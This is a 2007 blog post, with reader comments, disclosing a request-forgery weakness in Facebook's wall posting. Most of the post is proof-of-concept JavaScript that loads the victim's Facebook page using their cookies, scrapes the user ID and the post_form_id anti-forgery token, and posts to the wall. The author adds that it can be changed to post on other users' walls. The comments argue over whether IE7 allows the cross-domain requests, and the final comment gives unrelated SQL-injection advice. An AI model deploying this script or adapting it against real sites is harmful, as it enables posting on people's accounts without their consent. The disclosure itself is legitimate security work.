
Facebook Wall Security Vulnerability

In Facebook, if a user is logged in with the “Remember Me” option, an attacker can make requests on behalf of that user and post to his or her wall by sending the user a URL that contains Ajax JavaScript code. That code calls the Facebook services and makes the post on behalf of the user, using the credentials stored in the browser cookies. Facebook actually anticipated this attack and uses a technique that generates a random hash, which is used as an authentication token with every request to its services, to ensure that the request was made by the user and originates from the Facebook Ajax JavaScript. This token is rendered in the Facebook HTML and must be sent with each request, or the request is ignored. However, the attacker can obtain the token by simply requesting the page first with the user's credentials (which are stored on the user's machine in browser cookies), and can then proceed with the attack. I’ve written proof of concept code for this issue. If this code is executed by the user, it will post the message “Proof of Concept” on the user's wall. You can also change the code so it posts on other users' walls.

<script>

xmlHttp = GetXmlHttpObject()

var url = "http://www.facebook.com"

xmlHttp.onreadystatechange=stateChanged
xmlHttp.open("GET",url,true)
xmlHttp.send(null)

function stateChanged()
{
    if (xmlHttp.readyState==4)
    {
        //here we get the current logged in user id
        var user = xmlHttp.responseText.substring(xmlHttp.responseText.indexOf('name="user" value="') + 19, xmlHttp.responseText.indexOf('"', xmlHttp.responseText.indexOf('name="user" value="') + 19))

        //then we get the token hash that must be sent with every request
        var post_form_id = xmlHttp.responseText.substring(xmlHttp.responseText.indexOf('name="post_form_id" value="') + 27, xmlHttp.responseText.indexOf('"', xmlHttp.responseText.indexOf('name="post_form_id" value="') + 27))

        var xmlHttpPost = GetXmlHttpObject()
        xmlHttpPost.open("POST", "http://www.facebook.com/ajax/wallpost_ajax.php", true)
        xmlHttpPost.setRequestHeader("Content-Type","application/x-www-form-urlencoded")

        //we will make a post to the current user wall
        //we can make posts to other users walls too
        //by changing the "to" parameter to another user ID
        xmlHttpPost.send("to=" + user + "&from=" + user + "&wall_text=Proof of Concept&post_form_id=" + post_form_id + "&post_form_id=" + post_form_id)
    }
}

function GetXmlHttpObject()
{
    //i didn't add the code to create the XHR object for firefox because
    //it doesn't work on firefox already, if you have time to test this
    //POC with other browsers and it worked please let me know
    var xmlHttp
    try
    {
        xmlHttp=new ActiveXObject("Msxml2.XMLHTTP")
    }
    catch (e)
    {
        xmlHttp=new ActiveXObject("Microsoft.XMLHTTP")
    }
    return xmlHttp
}

</script>

 

Published Thursday, December 27, 2007 6:00 PM by Fady


Comments

# re: Facebook Wall Security Vulnerability

Wouldn't this only work if the script were hosted on Facebook.com?  Apart from some cross-domain Ajax hack, that is... typical browser security wouldn't allow an XMLHttpRequest to connect to a remote domain.  And not all cross-domain hacks would work, since the request still has to originate with the client so as to grab the user ID and post_form_id from the home page source...
Monday, February 18, 2008 11:36 PM by theharmonyguy

# re: Facebook Wall Security Vulnerability

"Wouldn't this only work if the script were hosted on Facebook.com?" If you are using Firefox then yes; if you are using IE7 then no.

"typical browser security wouldn't allow an XMLHttpRequest to connect to a remote domain"
Seems like the IE development team doesn't share this point of view with the majority of us :)
Wednesday, February 20, 2008 4:45 PM by Fady

# re: Facebook Wall Security Vulnerability

You sure that's the default behavior?  My tests have shown that local XMLHttpRequest works fine in IE7, but a remote request fails to connect.

For example, try clicking test on this page in IE7: http://theharmonyguy.com/xhrtest.html  Then fill in a remote domain and click test again - I get an access denied error.
Wednesday, February 20, 2008 11:48 PM by theharmonyguy

# re: Facebook Wall Security Vulnerability

Yes, I've tested this on several machines.
Also, I've tested this again using your script and it opens different domains without any problems; it gave me back a response from yahoo.com with a 200 success message and then the HTML content.
Nice script by the way :)
Thursday, February 21, 2008 5:17 PM by Fady

# re: Facebook Wall Security Vulnerability

I think the developer should take care of that and use parameters in his query, and should run his query from stored procedures and not write queries or any SQL command directly in the code.
Tuesday, March 04, 2008 11:38 AM by Khaled Mahmoud
